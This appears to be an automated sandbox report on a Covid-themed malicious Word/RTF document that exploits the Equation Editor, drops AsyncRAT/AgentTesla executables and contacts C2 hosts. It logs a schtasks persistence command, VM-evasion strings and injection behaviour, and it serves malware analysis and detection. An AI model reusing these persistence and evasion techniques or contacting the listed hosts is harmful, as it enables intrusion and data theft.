                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: C:\Users\Public\69577.exeCode function: 4_2_004683E6 push es; iretd
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpgJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
                      Source: C:\Users\Public\69577.exeFile created: C:\Users\user\AppData\Roaming\rLliXAh.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpgJump to dropped file

                      Boot Survival:

                      barindex
                      Yara detected AsyncRATShow sources
                      Source: Yara matchFile source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
                      Source: Yara matchFile source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
                      Source: C:\Users\Public\69577.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM_3Show sources
                      Source: Yara matchFile source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
                      Source: Yara matchFile source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE
                      Yara detected AsyncRATShow sources
                      Source: Yara matchFile source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
                      Source: Yara matchFile source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\69577.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, 69577.exe, 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Source: C:\Users\Public\69577.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0
                      Source: C:\Users\Public\69577.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\Public\69577.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 name: DriverDesc
                      Source: C:\Users\Public\69577.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\Public\69577.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\69577.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\69577.exeWindow / User API: threadDelayed 8917
                      Source: C:\Users\Public\69577.exeWindow / User API: threadDelayed 643
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2380Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2324Thread sleep time: -99889s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2924Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2924Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2760Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2784Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2804Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Users\Public\69577.exe TID: 2804Thread sleep count: 52 > 30
                      Source: C:\Users\Public\69577.exe TID: 3020Thread sleep count: 8917 > 30
                      Source: C:\Users\Public\69577.exe TID: 3020Thread sleep count: 643 > 30
                      Source: C:\Users\Public\69577.exeFile Volume queried: C:\ FullSizeInformation
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 69577.exe, 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmpBinary or memory string: vmware
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: 2m"SOFTWARE\VMware, Inc.\VMware Tools483m
                      Source: 69577.exe, 00000004.00000002.2114360333.00000000002E4000.00000004.00000001.sdmpBinary or memory string: VMware_S
                      Source: 69577.exe, 00000004.00000002.2116590485.0000000005920000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: 2m"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: 2m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 69577.exe, 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: 3m"SOFTWARE\VMware, Inc.\VMware Tools
                      Source: 69577.exe, 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\Public\69577.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\69577.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\Public\69577.exeMemory written: C:\Users\Public\69577.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: C:\Users\Public\69577.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\rLliXAh' /XML 'C:\Users\user\AppData\Local\Temp\tmpA055.tmp'
                      Source: C:\Users\Public\69577.exeProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
                      Source: 69577.exe, 00000007.00000002.2352370266.00000000024FE000.00000004.00000001.sdmpBinary or memory string: Program ManagerHD3m
                      Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: 69577.exe, 00000007.00000002.2352370266.00000000024FE000.00000004.00000001.sdmpBinary or memory string: Program ManagerHD3m%
                      Source: 69577.exe, 00000007.00000002.2352176065.0000000001080000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: 69577.exe, 00000007.00000002.2353238180.00000000047CA000.00000004.00000001.sdmpBinary or memory string: Message/Program Managerility Mode] - Microsoft Word Mode] - Micros
                      Source: 69577.exe, 00000007.00000002.2351851374.0000000000513000.00000004.00000020.sdmpBinary or memory string: Program ManagerR
                      Source: C:\Users\Public\69577.exeQueries volume information: C:\Users\Public\69577.exe VolumeInformation
                      Source: C:\Users\Public\69577.exeQueries volume information: C:\Users\Public\69577.exe VolumeInformation
                      Source: C:\Users\Public\69577.exeCode function: 4_2_00694B1C GetUserNameA,
                      Source: C:\Users\Public\69577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Yara detected AsyncRATShow sources
                      Source: Yara matchFile source: 00000004.00000002.2115324062.00000000025C8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2115181677.0000000002481000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2351735525.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2384, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 69577.exe PID: 2468, type: MEMORY
                      Source: Yara matchFile source: 4.2.69577.exe.25b56fc.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.69577.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.25b56fc.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.69577.exe.249fdd4.4.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\Public\69577.exeWMI Queries: IWbemServices::ExecQuery - Select * from AntivirusProduct

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Spearphishing Link1Windows Management Instrumentation11Scheduled Task/Job2Process Injection112Disable or Modify Tools1OS Credential DumpingAccount Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsScheduled Task/Job2Obfuscated Files or Information121LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery14SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job2Logon Script (Mac)Logon Script (Mac)Masquerading121NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion13LSA SecretsSecurity Software Discovery321SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol112Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsVirtualization/Sandbox Evasion13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 356233 Sample: Deadly Variants of Covid 19.doc Startdate: 22/02/2021 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->37 39 Multi AV Scanner detection for dropped file 2->39 41 Sigma detected: Scheduled temp file as task from temp location 2->41 43 16 other signatures 2->43 7 EQNEDT32.EXE 13 2->7         started        12 WINWORD.EXE 291 28 2->12         started        process3 dnsIp4 33 sgkmudder.org.tr 93.89.224.134, 49168, 80 TR-FBSTR Turkey 7->33 35 bit.ly 67.199.248.10, 49167, 80 GOOGLE-PRIVATE-CLOUDUS United States 7->35 23 C:\Users\user\...\mgLD5CcdJx9YVKl[1].jpg, PE32 7->23 dropped 25 C:\Users\Public\69577.exe, PE32 7->25 dropped 45 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->45 14 69577.exe 3 7->14         started        file5 signatures6 process7 file8 27 C:\Users\user\AppData\Roaming\rLliXAh.exe, PE32 14->27 dropped 29 C:\Users\user\AppData\Local\...\tmpA055.tmp, XML 14->29 dropped 47 Multi AV Scanner detection for dropped file 14->47 49 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->49 51 Machine Learning detection for dropped file 14->51 53 Injects a PE file into a foreign processes 14->53 18 69577.exe 4 14->18         started        21 schtasks.exe 14->21         started        signatures9 process10 dnsIp11 31 greatestyear2021.ddns.net 79.134.225.49, 49169, 5000 FINK-TELECOM-SERVICESCH Switzerland 18->31

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Deadly Variants of Covid 19.doc26%ReversingLabsDocument-RTF.Exploit.MathType

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\rLliXAh.exe100%Joe Sandbox ML
                      C:\Users\Public\69577.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mgLD5CcdJx9YVKl[1].jpg11%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\rLliXAh.exe11%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\Public\69577.exe11%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.69577.exe.f60000.3.unpack100%AviraHEUR/AGEN.1133757Download File
                      7.2.69577.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File

                      Domains

